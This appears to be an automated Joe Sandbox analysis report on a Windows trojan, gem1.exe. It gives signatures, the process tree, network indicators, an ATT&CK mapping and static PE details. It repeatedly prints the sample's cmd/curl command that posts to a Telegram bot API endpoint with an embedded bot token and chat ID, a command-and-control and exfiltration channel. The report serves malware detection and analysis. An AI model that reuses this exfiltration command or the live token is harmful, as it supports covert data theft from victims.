Edit tour

Windows Analysis Report
gem1.exe

Overview

General Information

Sample name:	gem1.exe
Analysis ID:	1586747
MD5:	ac4b32d014d380c67fbea66faf32ae99
SHA1:	7260fe957cf3b4eba0f6d59bf980c4f590ac0e90
SHA256:	65ad011502894d3437d68a6656f327ce18696610dec1226e9f24c84b5e90ac86
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

AI detected suspicious sample

Uses the Telegram API (likely for C&C communication)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates a process in suspended mode (likely to inject code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

Process Tree

System is w10x64

gem1.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\gem1.exe" MD5: AC4B32D014D380C67FBEA66FAF32AE99)

conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5348 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 6396 cmdline: curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" " MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" ", CommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\gem1.exe", ParentImage: C:\Users\user\Desktop\gem1.exe, ParentProcessId: 2716, ParentProcessName: gem1.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" ", ProcessId: 5348, ProcessName: cmd.exe

Suricata Signatures

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T15:28:54.759276+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49706	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.3% probability

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: gem1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\admin\source\repos\ConsoleApplication1\x64\Release\ConsoleApplication1.pdb source: gem1.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49706 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*Content-Length: 42Content-Type: application/x-www-form-urlencoded

Source: gem1.exe	String found in binary or memory: https://api.telegram.org/bot%s/sendMessage
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC10000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage-dchat_id=7437
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagea
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagek
Source: curl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagel
Source: curl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagep
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessageu

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: classification engine

Classification label: mal56.troj.winEXE@6/0@1/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03

Source: gem1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gem1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gem1.exe "C:\Users\user\Desktop\gem1.exe"
Source: C:\Users\user\Desktop\gem1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
Source: C:\Users\user\Desktop\gem1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "	Jump to behavior

Source: C:\Users\user\Desktop\gem1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gem1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gem1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: gem1.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: gem1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gem1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gem1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gem1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gem1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gem1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: gem1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: gem1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\admin\source\repos\ConsoleApplication1\x64\Release\ConsoleApplication1.pdb source: gem1.exe

Source: gem1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gem1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gem1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gem1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gem1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\gem1.exe

API coverage: 0.0 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: curl.exe, 00000003.00000003.2039573545.000001BB2BC24000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\gem1.exe

Code function: 0_2_00007FF662621880 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF662621880

Source: C:\Users\user\Desktop\gem1.exe	Code function: 0_2_00007FF6626213A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6626213A4
Source: C:\Users\user\Desktop\gem1.exe	Code function: 0_2_00007FF662621A24 SetUnhandledExceptionFilter,	0_2_00007FF662621A24
Source: C:\Users\user\Desktop\gem1.exe	Code function: 0_2_00007FF662621880 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF662621880

Source: C:\Users\user\Desktop\gem1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "			Jump to behavior

Source: C:\Users\user\Desktop\gem1.exe

Code function: 0_2_00007FF662621760 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF662621760

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Process Injection	OS Credential Dumping	1 System Time Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 DLL Side-Loading	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessageu	curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagek	curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot%s/sendMessage	gem1.exe	false	high
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagel	curl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage-dchat_id=7437	curl.exe, 00000003.00000002.2039906364.000001BB2BC10000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagea	curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagep	curl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586747
Start date and time:	2025-01-09 15:28:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gem1.exe
Detection:	MAL
Classification:	mal56.troj.winEXE@6/0@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: gem1.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	PO.exe	Get hash	malicious	MassLogger RAT	Browse
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	spreadmalware.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	tiko-ifyzit-srdh.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	Jx6bD8nM4qW9sL3v.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	dsoft.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	149.154.167.220
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	676556be12ac3.vbs	Get hash	malicious	Mint Stealer	Browse	149.154.167.220
	PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta	Get hash	malicious	Mint Stealer	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	4.828091453123838
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gem1.exe
File size:	11'776 bytes
MD5:	ac4b32d014d380c67fbea66faf32ae99
SHA1:	7260fe957cf3b4eba0f6d59bf980c4f590ac0e90
SHA256:	65ad011502894d3437d68a6656f327ce18696610dec1226e9f24c84b5e90ac86
SHA512:	58c49bbc0e7e7c20d264439e63217d46920c656c4933899fbcd8e1b1d52b88be40a874ebc404480f686fefed43410396bf710731400951e86afc3ee92e966f59
SSDEEP:	192:KMoY1gsdTeGn3MT3pT/Fap+k3Q5tfkcm/9K:KNAgcdnMpTU3d/o
TLSH:	8E323B0FE7D58CFED55A42B8CC6B115DE076B628A762A3CB1378141A2FC53E1662228D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jpE..#E..#E..#L..#O..#Uf."F..#Uf."F..#Uf."O..#Uf."V..#..."G..#E..#w..#.g."D..#.g.#D..#.g."D..#RichE..#................PE..d..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140001390
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67334C57 [Tue Nov 12 12:38:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	a255ca210722d7af895e8aaf3327dc81

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FD838B6B26Ch
dec eax
add esp, 28h
jmp 00007FD838B6AD17h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [00000C6Bh]
dec eax
mov ecx, ebx
call dword ptr [00000C5Ah]
call dword ptr [00000C64h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00000C98h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [00000C7Ch]
test eax, eax
je 00007FD838B6AEA9h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00002D22h]
call 00007FD838B6AF4Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [00002E09h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [00002D99h], eax
dec eax
mov eax, dword ptr [00002DF2h]
dec eax
mov dword ptr [00002C63h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [00002D67h], eax
mov dword ptr [00002C3Dh], C0000409h
mov dword ptr [00002C37h], 00000001h
mov dword ptr [00002C41h], 00000001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x298c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x5000	0x18c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7000	0x30	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2450	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2310	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x1a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf7c	0x1000	b7b11753494e5d7dd5afafdaad4a418e	False	0.642822265625	data	5.958966256529513	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x102c	0x1200	ef1e3f5c67993713817929fb60ec2286	False	0.3743489583333333	data	4.014436411183955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x680	0x200	85c2aebd011c5c1b37c1009def59c2b6	False	0.09375	data	0.5324895658143383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x5000	0x18c	0x200	f5ac1092c2daf7847701c7ccc986ca70	False	0.47265625	PEX Binary Archive	3.110000732430896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x1e0	0x200	d223c232889289f7388583adeff234e1	False	0.525390625	data	4.697597008251789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
